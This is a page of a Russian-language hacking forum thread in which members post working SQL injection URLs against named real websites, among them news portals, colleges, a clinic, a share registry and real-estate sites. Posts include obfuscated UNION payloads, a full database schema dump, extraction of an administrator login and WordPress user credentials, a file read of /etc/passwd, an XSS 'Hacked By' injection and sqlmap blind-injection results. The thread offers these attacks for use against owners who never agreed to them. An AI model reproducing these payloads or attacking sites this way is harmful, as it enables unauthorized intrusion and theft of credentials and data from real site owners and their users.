SQL Инъекции

Discussion in 'Уязвимости' started by yarbabin, 27 Apr 2015.

  1. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Ахах, полчаса делал вывод, Вот что значит нет практики
    PHP:
    http://www.indoramaeleme.com/media.php?id=59+u%6eion select 1,2,c%6fnc%61t(0x223c2f7465%37%38%37%34%36%317265613e27273e3c73%36%33%37%326970743e616c6572742822,table%5f%6e%61%6de,0x3e3e,%63%6f%6c%75%6d%6e%5f%6e%61%6d%65,0x22293b3c2f7363726970743e),4,5,6,7,8+%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%20%77%68%65%72%65%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29+--+-
    чтение файлов через hex(load_file(file)) вывод естественно с кодировки, кто сделает норм вывод поделитесь

    PHP:
    substring(load_file('/etc/passwd'),0,1)
    Вот что,   открыл я доки и понял что на русском нету  %30  того что есть 
     
    #141 BabaDook, 18 May 2017
    Last edited: 18 May 2017
    eminlayer7788, to.Index and palec2006 like this.
  2. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    Abu Dhabi Cricket Club
    Code:
    http://www.adcricketclub.ae/news_detail.php?newsID=-123+union+select+1,concat(0x3a,user(),database()),3,4,5,6--
     
  3. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    Malda College, India
    Code:
    http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,version(),3,database()--
     
  4. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    Code:
    view-source:http://bw-plast.com/en/news.php?id=-2+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--
    5.1.73-14.12-log
     
  5. extjs

    extjs Member

    Joined:
    23 Jun 2013
    Messages:
    31
    Likes Received:
    6
    Reputations:
    0
    Code:
    http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+
    Code:
    http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,(select+concat(@a,0x5B2F44554D505D)+from(select+@a:=0x5B44554D505D,(select+@a+from+information_schema.columns+where+table_schema=database()+and+@a:=concat(@a,table_name,0x09,column_name,0x0A)))a),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+
    Code:
    [DUMP]areas    id
    areas    name
    areas    image
    areas    styles
    areas    text
    areas    keywords
    areas    del
    areas    published
    articles    id
    articles    navigation
    articles    parent_id
    articles    lft
    articles    rght
    articles    name3
    articles    text
    articles    published
    articles    styles
    articles    keywords
    articles    image
    articles    del
    articles    dienst
    articles    name
    basa    ID
    basa    name
    basa    titel
    basa    text
    basa    email
    basa    datum
    basa    beschreibung
    basa    a
    basa    b
    basa    c
    basa    d
    basa    e
    basa    f
    basa    g
    basa    h
    basa    i
    basa    k
    bulgaria_part    id
    bulgaria_part    name
    bulgaria_part    image
    bulgaria_part    styles
    bulgaria_part    text
    bulgaria_part    keywords
    bulgaria_part    del
    bulgaria_part    published
    categories    id
    categories    name
    categories    published
    categories    image
    categories    styles
    categories    text
    categories    keywords
    categories    del
    cityobjects    id
    cityobjects    category_id
    cityobjects    user_id
    cityobjects    area_id
    cityobjects    image
    cityobjects    address
    cityobjects    room
    cityobjects    floors
    cityobjects    floor
    cityobjects    floorspace
    cityobjects    totalarea
    cityobjects    costmetr
    cityobjects    totalcost
    cityobjects    commission
    cityobjects    auction
    cityobjects    mortgage
    cityobjects    column
    cityobjects    note
    cityobjects    published
    cityobjects    created
    cityobjects    modified
    cityobjects    vid
    cityobjects    del
    cityobjects    term
    cityobjects    until
    cityobjects    untilroom
    cityobjects    mainfoto
    cityobjects    image2
    cityobjects    agent
    cityobjects    note2
    cityobjects    telefon
    cityobjects    operator
    countries    id
    countries    name
    countries    image
    countries    styles
    countries    text
    countries    text2
    countries    keywords
    countries    del
    countries    published
    foreignobjects    id
    foreignobjects    foreigntype_id
    foreignobjects    user_id
    foreignobjects    country_id
    foreignobjects    address
    foreignobjects    city
    foreignobjects    room
    foreignobjects    floors
    foreignobjects    floor
    foreignobjects    totalarea
    foreignobjects    totalcost
    foreignobjects    rent
    foreignobjects    note
    foreignobjects    published
    foreignobjects    created
    foreignobjects    modified
    foreignobjects    del
    foreignobjects    image2
    foreignobjects    image3
    foreignobjects    image4
    foreignobjects    image5
    foreignobjects    until
    foreignobjects    untilarea
    foreignobjects    untilroom
    foreignobjects    comment
    foreignobjects    keywords
    foreignobjects    mainfoto
    foreignobjects    about_country
    foreignobjects    bulgaria_part_id
    foreigntypes    id
    foreigntypes    name
    foreigntypes    image
    foreigntypes    styles
    foreigntypes    text
    foreigntypes    keywords
    foreigntypes    del
    foreigntypes    published
    groups    id
    groups    name
    groups    created
    groups    modified
    images    id
    images    image
    images    foreignobject_id
    posts    id
    posts    created
    posts    image
    posts    name
    posts    text
    posts    text2
    posts    published
    posts    del
    underground    id
    underground    name
    users    id
    users    username
    users    password
    users    first_name
    users    last_name
    users    email
    users    phone
    users    group_id
    users    created
    users    modified
    users    admin
    users    image
    users    del
    users    note
    users    fathername
    users    salt
    users2    id
    users2    login
    users2    password
    users2    salt
    [/DUMP]

    Code:
    http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,(select+concat_ws(0x09,username,password,salt,admin)from+users+limit+0,1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+
    Code:
    administrator    *тут был хеш*        1
    Code:
    http://www.severven.ru/robots.txt
    PHP:
      
    Missing Controller

    Error: Robots.txtController could not be found.

    Error: Create the class Robots.txtController below in file: app/controllers/robots.txt_controller.php

    <?php
    class Robots.txtController extends AppController {

        var 
    $name 'Robots.txt';
    }
    ?>

    Notice: If you want to customize this error message, create app/views/errors/missing_controller.ctp
     
    #145 extjs, 31 May 2017
    Last edited: 31 May 2017
  6. extjs

    extjs Member

    Joined:
    23 Jun 2013
    Messages:
    31
    Likes Received:
    6
    Reputations:
    0
    Code:
    view-source:http://mstream.fr/webtv/film.php?id=-1+union+select+1,2,@,4,5,6,7,8,9,10,11+from(select+@:=0x00,(select+@+from+wp_users+where+@:=concat(@,user_login,0x09,user_pass,0x0a)))q
     
  7. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    Code:
    http://www.greenwall.org/recent-news.php?id=-22+union+select+1,2,version(),4,database(),6,7,8,9,10,11,12,13,14,15,16--
     
  8. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.so-toulouse.com/index.php?id=167&act=-68+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
     
    Gorev likes this.
  9. extjs

    extjs Member

    Joined:
    23 Jun 2013
    Messages:
    31
    Likes Received:
    6
    Reputations:
    0
    Code:
    http://mobile-phone-buy.ru/buy_mobile.php?pc=DOOGEE-T5%27+union+all+select+%27%3E%3Cscript%3Ealert("Hacked By extjs")%3C/script%3E%27--+
    
    http://www.casuals.ru/product_info.php/products_id/11164'%20and%20extractvalue(0x00,concat(0x0a,(select%20table_name%20from%20information_schema.tables%20where%20table_name%20like%20'%25user%25'%20limit%203,1)))--%20/category/1
     
    #149 extjs, 27 Jun 2017
    Last edited: 28 Jun 2017
  10. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    550 тиц
    Code:
    http://www.landscrona.ru/tales/index.php?id=-111+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16+--+
    30 тиц

    Code:
    http://www.avon-beauty.ru/index.php?show_aux_page=(ExtractValue(1,concat(0x3a,(select(version())))))
    60 тиц
    Code:
    http://sejo.ru/index.php?page=119+union+select+1,2,3,4,@@version,6,7,8,9,10,11+--+1
    Внизу
     
    #150 WallHack, 28 Jun 2017
    Last edited: 28 Jun 2017
  11. extjs

    extjs Member

    Joined:
    23 Jun 2013
    Messages:
    31
    Likes Received:
    6
    Reputations:
    0
    Code:
    view-source:http://www.nesprosta.ru/?type=content&id=29'
    HTML:
    <!--SELECT * FROM structure WHERE id like '29''<br>Ошибка БД: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''29''' at line 1--><!--SELECT name,text FROM structure LEFT JOIN content ON structure.id=content.link_id WHERE structure.id=29'<br>Ошибка БД: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1-->
    
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <title>База данных квартир: купить квартиру в Москве, снять квартиру (Москва), цены на квартиры, объявления недвижимость - Nesprosta.ru</title>
    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
    Code:
    http://www.trest14perm.ru/newbuildings/?show_id=37+and+1=10+uNion+all+select+1,2,3,4,5,6,7--
    HTML:
    SQL Error: The used SELECT statements have a different number of columns at /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47<br><pre>Array
    (
        [code] => 1222
        [message] => The used SELECT statements have a different number of columns
        [query] => SELECT DISTINCT * FROM geocard,geomarks WHERE act=1 and geocard.type=geomarks.id and obj1=37 and 1=10 uNion all select 1,2,3,4,5,6,7-- GROUP BY type
        [context] => /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47
    )
    </pre>
    Code:
    http://kras-city.ru/info_krsnr.php?num=1%27+union+all+select+1,2,3,4,5,6,7,8,9,10,(select(@)from(select(@:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat(@,0x3c6c693e,table_schema,0x2e,table_name,0x3a,column_name))))a),12--+[
    Это как обойти?
    Code:
    http://www.meatbranch.com/advert/magazine.html'+and+'1'='1
    Code:
    http://www.teplopoint.ru/'--+[
    Code:
    http://www.zorginox.ru/sobitiya/504/'%20and%20'1'='1
     
    #151 extjs, 28 Jun 2017
    Last edited: 28 Jun 2017
  12. extjs

    extjs Member

    Joined:
    23 Jun 2013
    Messages:
    31
    Likes Received:
    6
    Reputations:
    0
    Code:
    http://an-tarusa.ru/View.aspx?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
    все равно не знаю, что с этим Jet Database делать
     
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
  14. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    АО «Сибирский реестр»

    Code:
    http://www.sibreg.ru/doc.php?id=-13827+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10--&menu=about
     
  15. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    Clínica Medilaser Neiva

    Code:
    http://www.clinicamedilaser.com.co/branch.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--
     
  16. SlipX

    SlipX New Member

    Joined:
    30 Aug 2013
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://www.kupa.pl/pl/humor.php?id=16
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=16 AND 1103=1103

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=16 AND 7554=BENCHMARK(5000000,MD5(0x6673754b))
    ---
    web application technology: Apache
    back-end DBMS: MySQL <= 5.0.11
    available databases [1]:
    [*] baza777
     
    Gorev likes this.
  17. SlipX

    SlipX New Member

    Joined:
    30 Aug 2013
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    Gorev likes this.
  18. SlipX

    SlipX New Member

    Joined:
    30 Aug 2013
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://adamslove.org/en-d.php?id=85
    (GET)
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=85' AND 1057=1057 AND 'wZNL'='wZNL
     
  19. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    196
    Likes Received:
    343
    Reputations:
    47
    Ну и кому это нужно?
     
    Octavian likes this.
  20. SlipX

    SlipX New Member

    Joined:
    30 Aug 2013
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    не смог докрутить, blind